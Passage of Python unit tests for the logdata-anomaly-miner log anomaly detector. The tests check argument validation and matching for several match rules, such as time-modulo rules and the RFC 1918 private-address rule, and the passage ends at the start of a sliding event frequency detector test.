nme.get_match_element("match", match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, vrmr) self.assertFalse(vrmr.match(log_atom)) self.assertRaises(ValueError, ValueRangeMatchRule, "", 1, 100) self.assertRaises(TypeError, ValueRangeMatchRule, b"default", 1, 100) self.assertRaises(TypeError, ValueRangeMatchRule, True, 1, 100) self.assertRaises(TypeError, ValueRangeMatchRule, 123, 1, 100) self.assertRaises(TypeError, ValueRangeMatchRule, 123.3, 1, 100) self.assertRaises(TypeError, ValueRangeMatchRule, {"id": "Default"}, 1, 100) self.assertRaises(TypeError, ValueRangeMatchRule, (), 1, 100) self.assertRaises(TypeError, 
ValueRangeMatchRule, [], 1, 100) self.assertRaises(TypeError, ValueRangeMatchRule, set(), 1, 100) self.assertRaises(ValueError, ValueRangeMatchRule, "default", 100, 1) self.assertRaises(TypeError, ValueRangeMatchRule, "default", [""], 100) self.assertRaises(TypeError, ValueRangeMatchRule, "default", b"default", 100) self.assertRaises(TypeError, ValueRangeMatchRule, "default", "default", 100) self.assertRaises(TypeError, ValueRangeMatchRule, "default", True, 100) self.assertRaises(TypeError, ValueRangeMatchRule, "default", {"id": "Default"}, 100) self.assertRaises(TypeError, ValueRangeMatchRule, "default", (), 100) self.assertRaises(TypeError, ValueRangeMatchRule, "default", set(), 100) self.assertRaises(TypeError, ValueRangeMatchRule, "default", 1, [""]) self.assertRaises(TypeError, ValueRangeMatchRule, "default", 1, b"default") self.assertRaises(TypeError, ValueRangeMatchRule, "default", 1, "default") self.assertRaises(TypeError, ValueRangeMatchRule, "default", 1, True) self.assertRaises(TypeError, ValueRangeMatchRule, "default", 1, {"id": "Default"}) self.assertRaises(TypeError, ValueRangeMatchRule, "default", 1, ()) self.assertRaises(TypeError, ValueRangeMatchRule, "default", 1, set()) self.assertRaises(TypeError, ValueRangeMatchRule, "default", 1, 100, match_action=b"default") self.assertRaises(TypeError, ValueRangeMatchRule, "default", 1, 100, match_action="default") self.assertRaises(TypeError, ValueRangeMatchRule, "default", 1, 100, match_action=True) self.assertRaises(TypeError, ValueRangeMatchRule, "default", 1, 100, match_action=123) self.assertRaises(TypeError, ValueRangeMatchRule, "default", 1, 100, match_action=123.3) self.assertRaises(TypeError, ValueRangeMatchRule, "default", 1, 100, match_action={"id": "Default"}) self.assertRaises(TypeError, ValueRangeMatchRule, "default", 1, 100, match_action=()) self.assertRaises(TypeError, ValueRangeMatchRule, "default", 1, 100, match_action=set()) self.assertRaises(TypeError, ValueRangeMatchRule, "default", 1, 
100, match_action=[]) def test12StringRegexMatchRule(self): """Test the StringRegexMatchRule.""" match_any = "match/any" alphabet = b"There are 26 letters in the english alphabet" regex = re.compile(rb"\w") srmr = StringRegexMatchRule(match_any, regex, None) fdme1 = DummyFixedDataModelElement("any", alphabet) fdme2 = DummyFixedDataModelElement("any", b"--> There are 26 letters in the english alphabet") match_context = DummyMatchContext(alphabet) match_element = fdme1.get_match_element("match", match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), 1, srmr) self.assertTrue(srmr.match(log_atom)) match_context = DummyMatchContext(b"--> There are 26 letters in the english alphabet") match_element = fdme2.get_match_element("match", match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), 1, srmr) self.assertFalse(srmr.match(log_atom)) self.assertRaises(ValueError, StringRegexMatchRule, "", regex) self.assertRaises(TypeError, StringRegexMatchRule, b"default", regex) self.assertRaises(TypeError, StringRegexMatchRule, True, regex) self.assertRaises(TypeError, StringRegexMatchRule, 123, regex) self.assertRaises(TypeError, StringRegexMatchRule, 123.3, regex) self.assertRaises(TypeError, StringRegexMatchRule, {"id": "Default"}, regex) self.assertRaises(TypeError, StringRegexMatchRule, (), regex) self.assertRaises(TypeError, StringRegexMatchRule, [], regex) self.assertRaises(TypeError, StringRegexMatchRule, set(), regex) self.assertRaises(TypeError, StringRegexMatchRule, None, regex) self.assertRaises(TypeError, StringRegexMatchRule, "default", None) self.assertRaises(TypeError, StringRegexMatchRule, "default", "default") self.assertRaises(TypeError, StringRegexMatchRule, "default", b"default") self.assertRaises(TypeError, StringRegexMatchRule, "default", True) self.assertRaises(TypeError, StringRegexMatchRule, "default", 123) self.assertRaises(TypeError, StringRegexMatchRule, "default", 123.3) 
self.assertRaises(TypeError, StringRegexMatchRule, "default", {"id": "Default"}) self.assertRaises(TypeError, StringRegexMatchRule, "default", ()) self.assertRaises(TypeError, StringRegexMatchRule, "default", []) self.assertRaises(TypeError, StringRegexMatchRule, "default", set()) self.assertRaises(TypeError, ValueMatchRule, "default", regex, match_action=b"default") self.assertRaises(TypeError, ValueMatchRule, "default", regex, match_action="default") self.assertRaises(TypeError, ValueMatchRule, "default", regex, match_action=True) self.assertRaises(TypeError, ValueMatchRule, "default", regex, match_action=123) self.assertRaises(TypeError, ValueMatchRule, "default", regex, match_action=123.3) self.assertRaises(TypeError, ValueMatchRule, "default", regex, match_action={"id": "Default"}) self.assertRaises(TypeError, ValueMatchRule, "default", regex, match_action=()) self.assertRaises(TypeError, ValueMatchRule, "default", regex, match_action=set()) self.assertRaises(TypeError, ValueMatchRule, "default", regex, match_action=[]) egma = EventGenerationMatchAction("Test.%s" % self.__class__.__name__, "", [self.stream_printer_event_handler]) ValueMatchRule("default", regex, egma) def test13ModuloTimeMatchRule(self): """Test the ModuloTimeMatchRule.""" model_syslog_time = "/model/syslog/time" mtmr = ModuloTimeMatchRule(model_syslog_time, 86400, 43200, 86400, None) t = time() match_element = MatchElement(model_syslog_time, b"14.02.2019 13:00:00", 1550149200, None) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, mtmr) self.assertTrue(mtmr.match(log_atom)) match_element = MatchElement(model_syslog_time, b"15.02.2019 00:00:00", 1550188800, None) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, mtmr) self.assertFalse(mtmr.match(log_atom)) match_element = MatchElement(model_syslog_time, b"14.02.2019 12:00:00", 1550145600, None) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, mtmr) 
self.assertTrue(mtmr.match(log_atom)) match_element = MatchElement(model_syslog_time, b"15.02.2019 01:00:00", 1550192400, None) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, mtmr) self.assertFalse(mtmr.match(log_atom)) self.assertRaises(ValueError, ModuloTimeMatchRule, "", 86400, 43200, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, b"default", 86400, 43200, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, True, 86400, 43200, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, 123, 86400, 43200, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, 123.3, 86400, 43200, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, {"id": "Default"}, 86400, 43200, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, (), 86400, 43200, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, [], 86400, 43200, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, set(), 86400, 43200, 86400) self.assertRaises(ValueError, ModuloTimeMatchRule, "default", 0, 43200, 86400) self.assertRaises(ValueError, ModuloTimeMatchRule, "default", -1, 43200, 86400) self.assertRaises(ValueError, ModuloTimeMatchRule, "default", 86400, 86400, 43200) self.assertRaises(ValueError, ModuloTimeMatchRule, "default", 86400, 43200, 86401) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 1.1, 43200, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", [""], 43200, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", b"default", 43200, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", "default", 43200, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", True, 43200, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", {"id": "Default"}, 43200, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", (), 43200, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", set(), 43200, 86400) self.assertRaises(ValueError, 
ModuloTimeMatchRule, "default", 86400, -1, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 1.1, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, [""], 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, b"default", 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, "default", 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, True, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, {"id": "Default"}, 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, (), 86400) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, set(), 86400) self.assertRaises(ValueError, ModuloTimeMatchRule, "default", 86400, 43200, -1) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86399.1) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, [""]) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, b"default") self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, "default") self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, True) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, {"id": "Default"}) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, ()) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, set()) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, match_action=b"default") self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, match_action="default") self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, match_action=True) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, match_action=123) self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, match_action=123.3) 
# NOTE(review): this run is the tail of the ModuloTimeMatchRule test whose `def` lies
# above; test14 follows in full and test15 continues past the end of this block.
# Remaining type checks: match_action and tzinfo reject every non-matching type.
self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, match_action={"id": "Default"})
self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, match_action=())
self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, match_action=set())
self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, match_action=[])
self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, tzinfo=b"default")
self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, tzinfo="default")
self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, tzinfo=True)
self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, tzinfo=123)
self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, tzinfo=123.3)
self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, tzinfo={"id": "Default"})
self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, tzinfo=())
self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, tzinfo=set())
self.assertRaises(TypeError, ModuloTimeMatchRule, "default", 86400, 43200, 86400, tzinfo=[])
# A real match action and a real tzinfo (the local zone derived from an aware UTC
# datetime) must be accepted; this construction only checks that nothing raises.
egma = EventGenerationMatchAction("Test.%s" % self.__class__.__name__, "", [self.stream_printer_event_handler])
ModuloTimeMatchRule(model_syslog_time, 86400, 0, 75000, egma, datetime.now(timezone.utc).astimezone().tzinfo)


def test14ValueDependentModuloTimeMatchRule(self):
    """
    Test the ValueDependentModuloTimeMatchRule.

    Two rules share the same path and a modulo of one day (86400 s).  vdmtmr1 carries a
    limit only for the value 1550145600 (14.02.2019 12:00:00), vdmtmr2 carries a limit
    for the same value plus default_limit=[43200, 86400].  The match assertions below
    indicate that the limit is looked up by the value found under target_path_list and
    that default_limit is applied when no entry exists — confirm against the rule class.
    The second half checks that every malformed constructor argument is rejected.
    """
    model_syslog_time = "/model/syslog/time"
    vdmtmr1 = ValueDependentModuloTimeMatchRule(model_syslog_time, 86400, [model_syslog_time], {1550145600: [43200, 86400]})
    vdmtmr2 = ValueDependentModuloTimeMatchRule(model_syslog_time, 86400, [model_syslog_time], {1550145600: [40000, 86400]}, default_limit=[43200, 86400])
    t = time()
    # 1550149200 = 46800 s after midnight UTC; no lookup entry for this value:
    # vdmtmr1 has no limit to apply, vdmtmr2 falls back to default_limit and matches.
    match_element = MatchElement(model_syslog_time, b"14.02.2019 13:00:00", 1550149200, None)
    log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, vdmtmr1)
    self.assertFalse(vdmtmr1.match(log_atom))
    self.assertTrue(vdmtmr2.match(log_atom))
    # 1550188800 = exactly midnight UTC (0 s); no entry, and 0 is outside the default range.
    match_element = MatchElement(model_syslog_time, b"15.02.2019 00:00:00", 1550188800, None)
    log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, vdmtmr1)
    self.assertFalse(vdmtmr1.match(log_atom))
    self.assertFalse(vdmtmr2.match(log_atom))
    # 1550145600 = 43200 s after midnight UTC and is a key of both lookup dicts;
    # 43200 lies inside [43200, 86400] as well as inside [40000, 86400].
    match_element = MatchElement(model_syslog_time, b"14.02.2019 12:00:00", 1550145600, None)
    log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, vdmtmr1)
    self.assertTrue(vdmtmr1.match(log_atom))
    self.assertTrue(vdmtmr2.match(log_atom))
    # 1550192400 = 3600 s after midnight UTC; no entry and outside the default range.
    match_element = MatchElement(model_syslog_time, b"15.02.2019 01:00:00", 1550192400, None)
    log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, vdmtmr1)
    self.assertFalse(vdmtmr1.match(log_atom))
    self.assertFalse(vdmtmr2.match(log_atom))
    # path: empty string is a ValueError, any non-str type a TypeError
    self.assertRaises(ValueError, ValueDependentModuloTimeMatchRule, "", 86400, default_limit=[43200, 86400])
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, b"default", 86400, default_limit=[43200, 86400])
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, True, 86400, default_limit=[43200, 86400])
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, 123, 86400, default_limit=[43200, 86400])
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, 123.3, 86400, default_limit=[43200, 86400])
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, {"id": "Default"}, 86400, default_limit=[43200, 86400])
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, (), 86400, default_limit=[43200, 86400])
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, [], 86400, default_limit=[43200, 86400])
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, set(), 86400, default_limit=[43200, 86400])
    # seconds_modulo: must be a positive int
    self.assertRaises(ValueError, ValueDependentModuloTimeMatchRule, "default", 0, default_limit=[43200, 86400])
    self.assertRaises(ValueError, ValueDependentModuloTimeMatchRule, "default", -1, default_limit=[43200, 86400])
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 1.1, default_limit=[43200, 86400])
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", [""], default_limit=[43200, 86400])
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", b"default", default_limit=[43200, 86400])
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", "default", default_limit=[43200, 86400])
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", True, default_limit=[43200, 86400])
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", {"id": "Default"}, default_limit=[43200, 86400])
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", (), default_limit=[43200, 86400])
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", set(), default_limit=[43200, 86400])
    # target_path_list: must be a list of non-empty str
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=[""], default_limit=[43200, 86400])
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=[b"default"], default_limit=[43200, 86400])
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=[True], default_limit=[43200, 86400])
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=[123], default_limit=[43200, 86400])
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list={"id": "Default"}, default_limit=[43200, 86400])
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=(), default_limit=[43200, 86400])
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=set(), default_limit=[43200, 86400])
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list="default", default_limit=[43200, 86400])
    # limit_lookup_dict: each value is a two-element int list [lower, upper] with
    # lower <= upper <= seconds_modulo; keys must not be None
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=["default"], limit_lookup_dict={1550145600: [86400, 43200]})
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=["default"], limit_lookup_dict={1550145600: [43200, 86401]})
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=["default"], limit_lookup_dict={1550145600: [43200]})
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=["default"], limit_lookup_dict={1550145600: [43200, 86401, 1]})
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=["default"], limit_lookup_dict={1550145600: (43200, 86401)})
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=["default"], limit_lookup_dict={None: [43200, 86400]})
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=["default"], limit_lookup_dict={1550145600: ["43200", 86400]})
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=["default"], limit_lookup_dict={1550145600: [b"43200", 86400]})
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=["default"], limit_lookup_dict={1550145600: [True, 86400]})
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=["default"], limit_lookup_dict={1550145600: [{"id": "Default"}, 86400]})
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=["default"], limit_lookup_dict={1550145600: [(43200,), 86400]})
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, target_path_list=["default"], limit_lookup_dict={1550145600: [set(), 86400]})
    # default_limit: same [lower, upper] shape rules as the lookup values
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[86400, 43200])
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86401])
    # a rule with neither a lookup dict nor a default_limit has nothing to match on
    self.assertRaises(ValueError, ValueDependentModuloTimeMatchRule, "default", 86400)
    self.assertRaises(ValueError, ValueDependentModuloTimeMatchRule, "default", 86400, [], {})
    self.assertRaises(ValueError, ValueDependentModuloTimeMatchRule, "default", 86400, None, None)
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=["43200", 86400])
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[b"43200", 86400])
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[True, 86400])
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[{"id": "Default"}, 86400])
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[(43200,), 86400])
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[set(), 86400])
    # match_action and tzinfo: any non-matching type is a TypeError
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], match_action=b"default")
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], match_action="default")
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], match_action=True)
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], match_action=123)
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], match_action=123.3)
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], match_action={"id": "Default"})
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], match_action=())
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], match_action=set())
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], match_action=[])
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], tzinfo=b"default")
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], tzinfo="default")
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], tzinfo=True)
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], tzinfo=123)
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], tzinfo=123.3)
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], tzinfo={"id": "Default"})
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], tzinfo=())
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], tzinfo=set())
    self.assertRaises(TypeError, ValueDependentModuloTimeMatchRule, "default", 86400, default_limit=[43200, 86400], tzinfo=[])
    # valid combinations that must construct without raising: an extra lookup entry,
    # an empty lookup plus default_limit, and None for both list and dict plus default_limit
    ValueDependentModuloTimeMatchRule(model_syslog_time, 86400, [model_syslog_time], {1550145600: [43200, 86400], 0: [1, 2]}, default_limit=[43200, 86400])
    ValueDependentModuloTimeMatchRule(model_syslog_time, 86400, [], {}, default_limit=[43200, 86400])
    ValueDependentModuloTimeMatchRule(model_syslog_time, 86400, None, None, default_limit=[43200, 86400])


def test15IPv4InRFC1918MatchRule(self):
    """
    Test the IPv4InRFC1918MatchRule.

    The lowest and highest address of each RFC 1918 block (10/8, 172.16/12, 192.168/16)
    must match, and the addresses directly below and above each block must not.
    The argument checks of this test continue past the end of this block.
    """
    t = time()  # NOTE(review): unused here; the log atoms below carry the literal timestamp 1
    match_ipv4 = "match/IPv4"
    ipv4mr = IPv4InRFC1918MatchRule(match_ipv4)
    # inclusive boundaries of the three private blocks
    private_addresses = [b"192.168.0.0", b"192.168.255.255", b"172.16.0.0", b"172.31.255.255", b"10.0.0.0", b"10.255.255.255"]
    # the neighbours just outside those boundaries
    public_addresses = [b"192.167.255.255", b"192.169.0.0", b"172.15.255.255", b"172.32.0.0", b"9.255.255.255", b"11.0.0.0"]
    # NOTE(review): fdme1/fdme2 are not referenced again; each loop builds its own element
    fdme1 = DummyFixedDataModelElement("IPv4", b"192.168.0.0")
    fdme2 = DummyFixedDataModelElement("IPv4", b"192.168.0.1")
    for ip in private_addresses:
        fdme = DummyFixedDataModelElement("IPv4", ip)
        match_context = DummyMatchContext(ip)
        match_element = fdme.get_match_element("match", match_context)
        # Dotted quad -> 32-bit integer, stored as match_object so the rule sees the
        # numeric form of the address (presumably what a real IPv4 parser element would
        # provide — confirm against the rule class).  math.pow returns floats, but every
        # intermediate value is far below 2**53, so the int() conversion is exact.
        x = [int(x.decode()) for x in ip.split(b".")]
        match_element.match_object = int(x[0] * math.pow(256, 3) + x[1] * math.pow(256, 2) + x[2] * math.pow(256, 1) + x[3])
        log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), 1, ipv4mr)
        self.assertTrue(ipv4mr.match(log_atom))
    for ip in public_addresses:
        fdme = DummyFixedDataModelElement("IPv4", ip)
        match_context = DummyMatchContext(ip)
        match_element = fdme.get_match_element("match", match_context)
        # same integer conversion as above
        x = [int(x.decode()) for x in ip.split(b".")]
        match_element.match_object = int(x[0] * math.pow(256, 3) + x[1] * math.pow(256, 2) + x[2] * math.pow(256, 1) + x[3])
        log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), 1, ipv4mr)
        self.assertFalse(ipv4mr.match(log_atom))
    # path: empty string is a ValueError, any non-str type a TypeError
    self.assertRaises(ValueError, IPv4InRFC1918MatchRule, "")
    self.assertRaises(TypeError, IPv4InRFC1918MatchRule, b"default")
    self.assertRaises(TypeError, IPv4InRFC1918MatchRule, True)
    self.assertRaises(TypeError, IPv4InRFC1918MatchRule, 123)
    self.assertRaises(TypeError, IPv4InRFC1918MatchRule, 123.3)
    self.assertRaises(TypeError, IPv4InRFC1918MatchRule, {"id": "Default"})
    self.assertRaises(TypeError, IPv4InRFC1918MatchRule, ())
self.assertRaises(TypeError, IPv4InRFC1918MatchRule, []) self.assertRaises(TypeError, IPv4InRFC1918MatchRule, set()) self.assertRaises(TypeError, IPv4InRFC1918MatchRule, None) self.assertRaises(TypeError, IPv4InRFC1918MatchRule, "default", match_action=b"default") self.assertRaises(TypeError, IPv4InRFC1918MatchRule, "default", match_action="default") self.assertRaises(TypeError, IPv4InRFC1918MatchRule, "default", match_action=True) self.assertRaises(TypeError, IPv4InRFC1918MatchRule, "default", match_action=123) self.assertRaises(TypeError, IPv4InRFC1918MatchRule, "default", match_action=123.3) self.assertRaises(TypeError, IPv4InRFC1918MatchRule, "default", match_action={"id": "Default"}) self.assertRaises(TypeError, IPv4InRFC1918MatchRule, "default", match_action=()) self.assertRaises(TypeError, IPv4InRFC1918MatchRule, "default", match_action=set()) self.assertRaises(TypeError, IPv4InRFC1918MatchRule, "default", match_action=[]) egma = EventGenerationMatchAction("Test.%s" % self.__class__.__name__, "", [self.stream_printer_event_handler]) IPv4InRFC1918MatchRule("default", egma) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/SlidingEventFrequencyDetectorTest.py000066400000000000000000001056221500476301700327720ustar00rootroot00000000000000import unittest import time from datetime import datetime from aminer.analysis.SlidingEventFrequencyDetector import SlidingEventFrequencyDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase class SlidingEventFrequencyDetectorTest(TestBase): """Unittests for the SlidingEventFrequencyDetector.""" def test1receive_atom(self): """ This test case checks the normal detection of new frequencies. The sEFD is used with one path to be analyzed over four time windows. 
The frequencies do not change a lot in the first time windows, thus no anomalies are generated. Then, value frequencies change and anomalies are created in the last time windows. Test if log atoms are processed correctly and the detector is learning (learn_mode=True) and stops if learn_mode=False. Test if stop_learning_time and stop_learning_no_anomaly_timestamp are implemented properly. """ # Initialize detector for analyzing values in one path in time windows of 10 seconds t = time.time() expected_string_first = '%s Frequency exceeds range for the first time\n%s: "None" (%d lines)\n %s\n\n' expected_string = '%s Frequency anomaly detected\n%s: "None" (%d lines)\n %s\n\n' dtf = "%Y-%m-%d %H:%M:%S" sefd = SlidingEventFrequencyDetector(aminer_config=self.aminer_config, anomaly_event_handlers=[self.stream_printer_event_handler], window_size=10, set_upper_limit=2, learn_mode=True, output_logline=False) # Prepare log atoms that represent different amounts of values a, b over time # Four time windows are used. The first time window is used for initialization. The # second time window represents normal behavior, i.e., the frequencies do not change # too much and no anomalies should be generated. The third window contains changes # of value frequencies and thus anomalies should be generated. The fourth time window # only has the purpose of marking the end of the third time window. 
# NOTE(review): this run is the middle of test1receive_atom; its `def`, docstring and
# the first detector construction (window_size=10, set_upper_limit=2, learn_mode=True)
# lie above, the stop_learning_* checks follow below.
# The following log atoms are created:
# window 1:
# value a: 2 times
# value b: 1 time
# window 2:
# value a: 3 times
# value b: 1 time
# window 3:
# value a: 0 times
# value b: 2 times
# window 4:
# value a: 1 time
# Start of window 1:
log_atom1 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 1, None)
log_atom2 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t + 3, None)
log_atom3 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 7, None)
# Start of window 2:
log_atom4 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 13, None)
log_atom5 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t + 17, None)
log_atom6 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 18, None)
log_atom7 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 19, None)
# Start of window 3:
log_atom8 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t + 25, None)
log_atom9 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t + 25, None)
# Start of window 4:
log_atom10 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 35, None)

